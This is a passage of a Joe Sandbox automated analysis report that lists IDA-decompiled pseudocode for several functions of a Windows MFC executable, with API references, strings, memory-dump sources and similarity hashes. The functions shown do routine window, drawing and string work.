				 *(_t36 - 0x14) =  *(_t36 - 0x14) & 0x00000000;
				L0043DDD8();
				_t30 = 1;
				 *(_t36 - 4) = _t30;
				if( *((intOrPtr*)( *__ecx - 8)) != 0) {
					_push( *((intOrPtr*)(__ecx + 4)));
					_push( *__ecx);
					_push("%s <%s>");
					_push(_t36 - 0x10);
					L0043E174();
				} else {
					_push(__ecx + 4);
					L0043DFCA();
				}
				_push(_t36 - 0x10);
				L0043DD3C();
				 *(_t36 - 0x14) = _t30;
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return  *((intOrPtr*)(_t36 + 8));
			}

0x00410e7c
0x00410e81
0x00410e82
0x00410e83
0x00410e8e
0x00410e97
0x00410e9c
0x00410e9f
0x00410eaf
0x00410eb5
0x00410eb7
0x00410ebc
0x00410ebd
0x00410ea1
0x00410ea7
0x00410ea8
0x00410ea8
0x00410ecb
0x00410ecc
0x00410ed1
0x00410ed4
0x00410edb
0x00410ee8
0x00410ef0

APIs

__EH_prolog.LIBCMT ref: 00410E7C
#540.MFC42 ref: 00410E8E
#858.MFC42 ref: 00410EA8
#2818.MFC42(?,%s <%s>,?,?), ref: 00410EBD
#535.MFC42(?), ref: 00410ECC
#800.MFC42(?), ref: 00410EDB

Strings

%s <%s>, xrefs: 00410EB7

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2818#535#540#800#858H_prolog
String ID: %s <%s>
API String ID: 1004837876-227962274
Opcode ID: 730e7a70200d122ecfddc3babf176229b3d03cec0181017f1afe80301b8b8990
Instruction ID: 71484664902f626659bbcb50e86e222cf8a267f8aa492818e04212967d33a89d
Opcode Fuzzy Hash: 730e7a70200d122ecfddc3babf176229b3d03cec0181017f1afe80301b8b8990
Instruction Fuzzy Hash: D5019A72D00119EBDB11EB95C942BEEB3B4EF08308F10482FF411A7280D7B86A44CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00409AEA, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00409AEA(void* __ebx) {
				signed int _t14;
				void* _t17;
				signed int _t19;
				void* _t26;

				E0043E4E0(0x43f8f8, _t26);
				if(strncmp( *(_t26 + 0xc), "IMClass", 7) != 0 || IsWindow( *(_t26 + 8)) == 0) {
					_t14 = 0;
				} else {
					_push( *(_t26 + 8));
					_push(_t26 + 8);
					_t17 = E0040FEA7();
					_t19 = 0;
					_push("Instant Message");
					 *(_t26 - 4) = 0;
					L0043DFD6();
					if(_t17 != 0xffffffff) {
						_t19 = 1;
					}
					 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
					L0043DD36();
					_t14 = _t19;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t26 - 0xc));
				return _t14;
			}

0x00409aef
0x00409b09
0x00409b53
0x00409b18
0x00409b1c
0x00409b1f
0x00409b20
0x00409b27
0x00409b29
0x00409b31
0x00409b34
0x00409b3c
0x00409b4f
0x00409b4f
0x00409b3e
0x00409b45
0x00409b4a
0x00409b4c
0x00409b58
0x00409b60

APIs

__EH_prolog.LIBCMT ref: 00409AEF
strncmp.MSVCRT(?,IMClass,00000007), ref: 00409AFE
IsWindow.USER32(?), ref: 00409B0E

Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38

#2764.MFC42(Instant Message), ref: 00409B34
#800.MFC42(Instant Message), ref: 00409B45

Strings

Instant Message, xrefs: 00409B29
IMClass, xrefs: 00409AF6

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800H_prologMessageSendWindow$#2764#535#537#823#825memsetstrncmp
String ID: IMClass$Instant Message
API String ID: 3887305776-4191539829
Opcode ID: 56567f191300ebdc2aa62c89ead3a7aec4aff7847f2036aa5403ab8f2e3b9c60
Instruction ID: 383a8b6c402a69219dc45ddaf8d89b64e1b1a77421f91e11c687aff65abc395c
Opcode Fuzzy Hash: 56567f191300ebdc2aa62c89ead3a7aec4aff7847f2036aa5403ab8f2e3b9c60
Instruction Fuzzy Hash: 82016D31500208AFCB14AF60E841B997B60BB153A9F20953BF926662D2E7389B59D618

Uniqueness

Uniqueness Score: -1.00%

Function 0040E6E1, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 36
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040E6E1(void* __ecx) {
				void* _t18;
				int _t19;
				void* _t32;

				E0043E4E0(0x440148, _t32);
				_push( *((intOrPtr*)(_t32 + 0x1c)));
				L0043E132();
				 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
				_t18 = _t32 - 0x14;
				_push(_t18);
				L0043E12C();
				_t19 = PatBlt( *( *((intOrPtr*)(_t32 + 8)) + 4),  *(_t32 + 0xc),  *(_t32 + 0x10),  *(_t32 + 0x14),  *(_t32 + 0x18), 0xf00021);
				_push(_t18);
				L0043E12C();
				 *((intOrPtr*)(_t32 - 0x14)) = 0x445440;
				 *(_t32 - 4) = 1;
				L0043DD72();
				 *[fs:0x0] =  *((intOrPtr*)(_t32 - 0xc));
				return _t19;
			}

0x0040e6e6
0x0040e6ef
0x0040e6f5
0x0040e6fd
0x0040e701
0x0040e706
0x0040e707
0x0040e722
0x0040e728
0x0040e72b
0x0040e730
0x0040e73a
0x0040e741
0x0040e74b
0x0040e753

APIs

__EH_prolog.LIBCMT ref: 0040E6E6
#283.MFC42(?,00000000,?,?,?,0040E541,?,?,00000000,?,?,?,?,00000000), ref: 0040E6F5
#5788.MFC42(?,?,00000000,?,?,?,0040E541,?,?,00000000,?,?,?,?,00000000), ref: 0040E707
PatBlt.GDI32(00000000,?,?,?,?,00F00021), ref: 0040E722
#5788.MFC42(00000000,?,?,0040E541,?,?,00000000,?,?,?,?,00000000), ref: 0040E72B
#2414.MFC42(00000000,?,?,0040E541,?,?,00000000,?,?,?,?,00000000), ref: 0040E741

Strings

@TD, xrefs: 0040E737

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #5788$#2414#283H_prolog
String ID: @TD
API String ID: 2944278317-549275915
Opcode ID: 52ebffd27f7c178886eaaabaf272c573f45670bdf8741eba118a83788a9a6adc
Instruction ID: ef99ff5f0362d1c5c1558fa9b1fa4c268aeb4576bd53e5dcf2ec4f4fd943af46
Opcode Fuzzy Hash: 52ebffd27f7c178886eaaabaf272c573f45670bdf8741eba118a83788a9a6adc
Instruction Fuzzy Hash: 50F08C72500109ABCF01EF92CD06BEEBB79EF88348F00401EF90566292CB799A24DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040E07A, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040E07A(intOrPtr __ecx) {
				intOrPtr _t30;
				void* _t32;

				E0043E4E0(0x440078, _t32);
				_push(__ecx);
				_t30 = __ecx;
				 *((intOrPtr*)(_t32 - 0x10)) = __ecx;
				L0043DF64();
				 *((intOrPtr*)(__ecx)) = 0x446660;
				 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
				L0043DDD8();
				 *(__ecx + 0x58) =  *(__ecx + 0x58) & 0x00000000;
				 *((intOrPtr*)(__ecx + 0x54)) = 0x44615c;
				 *(__ecx + 0x60) =  *(__ecx + 0x60) & 0x00000000;
				 *((intOrPtr*)(__ecx + 0x5c)) = 0x44615c;
				 *(__ecx + 0x68) =  *(__ecx + 0x68) & 0x00000000;
				 *((intOrPtr*)(__ecx + 0x64)) = 0x445468;
				 *(_t32 - 4) = 4;
				L0043DDD8();
				 *((intOrPtr*)(__ecx)) = 0x446b68;
				 *((intOrPtr*)(_t30 + 0x50)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t30 + 0x48)) = 0x190;
				 *((intOrPtr*)(_t30 + 0x44)) = 0xc;
				 *[fs:0x0] =  *((intOrPtr*)(_t32 - 0xc));
				return _t30;
			}

0x0040e07f
0x0040e084
0x0040e086
0x0040e088
0x0040e08b
0x0040e090
0x0040e096
0x0040e09d
0x0040e0a2
0x0040e0ab
0x0040e0ae
0x0040e0b2
0x0040e0b5
0x0040e0b9
0x0040e0c3
0x0040e0c7
0x0040e0ce
0x0040e0dd
0x0040e0e0
0x0040e0e7
0x0040e0f1
0x0040e0f9

APIs

__EH_prolog.LIBCMT ref: 0040E07F
#567.MFC42(?,?,0040D2FA), ref: 0040E08B
#540.MFC42(?,?,0040D2FA), ref: 0040E09D
#540.MFC42 ref: 0040E0C7
GetSysColor.USER32(0000000F), ref: 0040E0D4

Strings

hTD, xrefs: 0040E0B9
C, xrefs: 0040E0A6

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #540$#567ColorH_prolog
String ID: hTD$C
API String ID: 51933270-3350089059
Opcode ID: 817b0c87b830998d9f9980eb79a3cbfaab87fcf5a91b595c2255a959ad698267
Instruction ID: fcc37cde1e1617dd15859a7bbaa9c72ef7877a644b6c57f4322b9692761d81ca
Opcode Fuzzy Hash: 817b0c87b830998d9f9980eb79a3cbfaab87fcf5a91b595c2255a959ad698267
Instruction Fuzzy Hash: DA0112B1851B508FE720DF69D50539ABBF0EF08719F00882EE18286A81D7BDA548CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00403695, Relevance: 12.1, APIs: 8, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00403695(intOrPtr* _a8, intOrPtr* _a12) {
				char _v4;
				intOrPtr* _v24;
				char _v28;
				char _v32;
				intOrPtr* _v36;
				intOrPtr* _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v408;
				char _v664;
				intOrPtr _t43;
				char _t44;
				intOrPtr _t53;
				char _t54;
				intOrPtr _t67;
				intOrPtr* _t73;
				intOrPtr* _t74;

				_t73 = _v24;
				_v44 = _t73;
				 *((intOrPtr*)( *_a8 + 0x38))();
				 *((intOrPtr*)( *_a12 + 0x44))();
				_t43 =  *((intOrPtr*)( *_t73 + 0x14))( &_v664, 0xff, 0);
				_push(0x10);
				L0043DD54();
				_a8 = _t43;
				_v4 = 0xa;
				if(_t43 == 0) {
					_t44 = 0;
				} else {
					_push( &_v664);
					_push( *((intOrPtr*)(_t73 + 8)));
					_t44 = E00403862(_t43);
				}
				_v32 = _t44;
				_v4 = 9;
				L0043E528();
				_v36 = _v24;
				L0043DE2C();
				L0043DDA2();
				L0043E528();
				_t74 = _v24;
				_v36 = _t74;
				 *((intOrPtr*)( *_a8 + 0x38))(0, 0,  &_v408,  &_v32, 0x44ac58);
				 *((intOrPtr*)( *_a12 + 0x44))();
				_t53 =  *((intOrPtr*)( *_t74 + 0x14))( &_v664, 0xff, 0);
				L0043DD54();
				_t67 = 0x10;
				_a8 = _t53;
				_v4 = 3;
				if(_t53 == 0) {
					_t54 = 0;
				} else {
					_push( &_v664);
					_t67 = _t53;
					_push( *((intOrPtr*)(_t74 + 8)));
					_t54 = E00403862(_t67);
				}
				_v28 = _t54;
				_push(0x44ac58);
				_push( &_v28);
				_v4 = 2;
				L0043E528();
				_push(_t67);
				_v60 = _v60 & 0x00000000;
				_push(_t67 + 4);
				L0043DD3C();
				return _v48;
			}

0x00403698
0x0040369b
0x004036a0
0x004036a8
0x004036bd
0x004036c0
0x004036c2
0x004036c8
0x004036cd
0x004036d1
0x004036e6
0x004036d3
0x004036d9
0x004036dc
0x004036df
0x004036df
0x004036e8
0x004036f4
0x004036f8
0x00403705
0x0040370f
0x00403714
0x0040371d
0x00403725
0x00403728
0x0040372d
0x00403735
0x0040374a
0x0040374f
0x00403754
0x00403755
0x0040375a
0x0040375e
0x00403773
0x00403760
0x00403766
0x00403767
0x00403769
0x0040376c
0x0040376c
0x00403775
0x0040377b
0x00403780
0x00403781
0x00403785
0x0040378d
0x0040378e
0x00403795
0x00403799
0x004037a2

APIs

#823.MFC42(00000010), ref: 004036C2
_CxxThrowException.MSVCRT(?,0044AC58), ref: 004036F8
#5628.MFC42(?,?,0044AC58), ref: 0040370F
#1264.MFC42(?,?,0044AC58), ref: 00403714
_CxxThrowException.MSVCRT(00000000,00000000), ref: 0040371D
#823.MFC42(00000010), ref: 0040374F
_CxxThrowException.MSVCRT(?,0044AC58), ref: 00403785
#535.MFC42(?,?,?,?,0044AC58), ref: 00403799

Part of subcall function 00403862: __EH_prolog.LIBCMT ref: 00403867
Part of subcall function 00403862: #350.MFC42(?,?,0040333B,?,?), ref: 00403873
Part of subcall function 00403862: #537.MFC42(?,?,?,0040333B,?,?), ref: 00403888

Memory Dump Source

Source File: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: ExceptionThrow$#823$#1264#350#535#537#5628H_prolog
String ID:
API String ID: 216941690-0
Opcode ID: b1c42561fc01e0e306c22f0807ad9f072f9b7db322414ad92d059e5220d86ede
Instruction ID: 761ca4f1101e26c843b1174fb7b7b65db187916399e1db1a8b6ae42cd91817be
Opcode Fuzzy Hash: b1c42561fc01e0e306c22f0807ad9f072f9b7db322414ad92d059e5220d86ede
Instruction Fuzzy Hash: 35315E71A00208AFDB44DFA9D845BED7BF4AF08305F1044AEF509E7291DB749A44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00419865, Relevance: 12.1, APIs: 8, Instructions: 90COMMON

Download Yara Rule

APIs

#4710.MFC42 ref: 0041986B
#1779.MFC42(00000421,?,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080), ref: 004198E6
#1779.MFC42(00000427,?,00000421,?,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF), ref: 004198FD
#1779.MFC42(00000428,?,00000427,?,00000421,?,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 00419914
#1779.MFC42(00000429,?,00000428,?,00000427,?,00000421,?,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101), ref: 0041992B
#1779.MFC42(0000042A,?,00000429,?,00000428,?,00000427,?,00000421,?,?,00EFEFEF,00010101,00808080,00000001), ref: 00419942
#1779.MFC42(0000080F,?,0000042A,?,00000429,?,00000428,?,00000427,?,00000421,?,?,00EFEFEF,00010101,00808080), ref: 00419959
#1779.MFC42(0000042B,?,0000080F,?,0000042A,?,00000429,?,00000428,?,00000427,?,00000421,?,?,00EFEFEF), ref: 00419970

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #1779$#4710
String ID:
API String ID: 2950569931-0
Opcode ID: 870db30d4787f2a8a84b9bf8d72d01d894e7bcafa7fb1fc7817d85e38a29538f
Instruction ID: 6e9bc034436d086fb2d0abc6a9a07030acd277da4720c2757fe4b2011958ecf9
Opcode Fuzzy Hash: 870db30d4787f2a8a84b9bf8d72d01d894e7bcafa7fb1fc7817d85e38a29538f
Instruction Fuzzy Hash: 1D2197717447507EE120A256DC92FB73ADCDB8AB08F0404AEB7C69B2D2C995BE008774

Uniqueness

Uniqueness Score: -1.00%

Function 0040B651, Relevance: 12.1, APIs: 8, Instructions: 90
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E0040B651(void* __ecx, void* __eflags) {
				intOrPtr* _t11;
				intOrPtr* _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;
				intOrPtr* _t19;
				intOrPtr* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t35;
				intOrPtr* _t36;
				intOrPtr* _t37;
				void* _t47;

				_push(E0040949A(__ecx));
				L0043DD42();
				_push(E00409797(__ecx));
				L0043DD42();
				_pop(_t35);
				_t11 = E0040A372(_t35);
				_t47 = 1;
				if(_t11 != 0) {
					_t35 = _t11;
					 *((intOrPtr*)( *_t11 + 0x10))(_t47);
				}
				_push(E0040904E(_t35));
				L0043DD42();
				_push(E00409365(_t35));
				L0043DD42();
				_push(E00409207(_t35));
				L0043DD42();
				_push(E0040A8C1(_t35));
				L0043DD42();
				_t16 = E00409D76(_t35);
				if(_t16 != 0) {
					_t35 = _t16;
					 *((intOrPtr*)( *_t16 + 0x10))(_t47);
				}
				_t17 = E00409F58(_t35);
				if(_t17 != 0) {
					_t35 = _t17;
					 *((intOrPtr*)( *_t17 + 0x10))(_t47);
				}
				_t18 = E00409999(_t35);
				if(_t18 != 0) {
					_t35 = _t18;
					 *((intOrPtr*)( *_t18 + 0x10))(_t47);
				}
				_t19 = E0040AC1B(_t35);
				if(_t19 != 0) {
					_t35 = _t19;
					 *((intOrPtr*)( *_t19 + 0x10))(_t47);
				}
				_push(E0040A58A(_t35));
				L0043DD42();
				_pop(_t36);
				_t21 = E0040A784(_t36);
				if(_t21 != 0) {
					_t36 = _t21;
					 *((intOrPtr*)( *_t21 + 0x10))(_t47);
				}
				_push(E0040AA23(_t36));
				L0043DD42();
				_pop(_t37);
				_t23 = E0040AEAA(_t37);
				if(_t23 != 0) {
					_t37 = _t23;
					 *((intOrPtr*)( *_t23 + 0x10))(_t47);
				}
				_t24 = E0040B3CF(_t37);
				if(_t24 != 0) {
					return  *((intOrPtr*)( *_t24 + 0x10))(_t47);
				}
				return _t24;
			}

0x0040b657
0x0040b658
0x0040b662
0x0040b663
0x0040b669
0x0040b66a
0x0040b673
0x0040b674
0x0040b679
0x0040b67b
0x0040b67b
0x0040b683
0x0040b684
0x0040b68e
0x0040b68f
0x0040b699
0x0040b69a
0x0040b6a4
0x0040b6a5
0x0040b6ad
0x0040b6b4
0x0040b6b9
0x0040b6bb
0x0040b6bb
0x0040b6be
0x0040b6c5
0x0040b6ca
0x0040b6cc
0x0040b6cc
0x0040b6cf
0x0040b6d6
0x0040b6db
0x0040b6dd
0x0040b6dd
0x0040b6e0
0x0040b6e7
0x0040b6ec
0x0040b6ee
0x0040b6ee
0x0040b6f6
0x0040b6f7
0x0040b6fc
0x0040b6fd
0x0040b704
0x0040b709
0x0040b70b
0x0040b70b
0x0040b713
0x0040b714
0x0040b719
0x0040b71a
0x0040b721
0x0040b726
0x0040b728
0x0040b728
0x0040b72b
0x0040b732
0x00000000
0x0040b739
0x0040b73d

APIs

Part of subcall function 0040949A: __EH_prolog.LIBCMT ref: 0040949F
Part of subcall function 0040949A: #823.MFC42(00000004,?,0040FCBD,?,00000000), ref: 004094B0

#825.MFC42(00000000), ref: 0040B658

Part of subcall function 00409797: __EH_prolog.LIBCMT ref: 0040979C
Part of subcall function 00409797: #823.MFC42(00000004,?,0040FCDC,?,00000000), ref: 004097AD

#825.MFC42(00000000,00000000), ref: 0040B663

Part of subcall function 0040A372: __EH_prolog.LIBCMT ref: 0040A377
Part of subcall function 0040A372: #823.MFC42(00000004,?,0040FBC5,?,00000000), ref: 0040A388

#825.MFC42(00000000), ref: 0040B684
#825.MFC42(00000000,00000000), ref: 0040B68F
#825.MFC42(00000000,00000000,00000000), ref: 0040B69A
#825.MFC42(00000000,00000000,00000000,00000000), ref: 0040B6A5
#825.MFC42(00000000), ref: 0040B6F7
#825.MFC42(00000000), ref: 0040B714

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
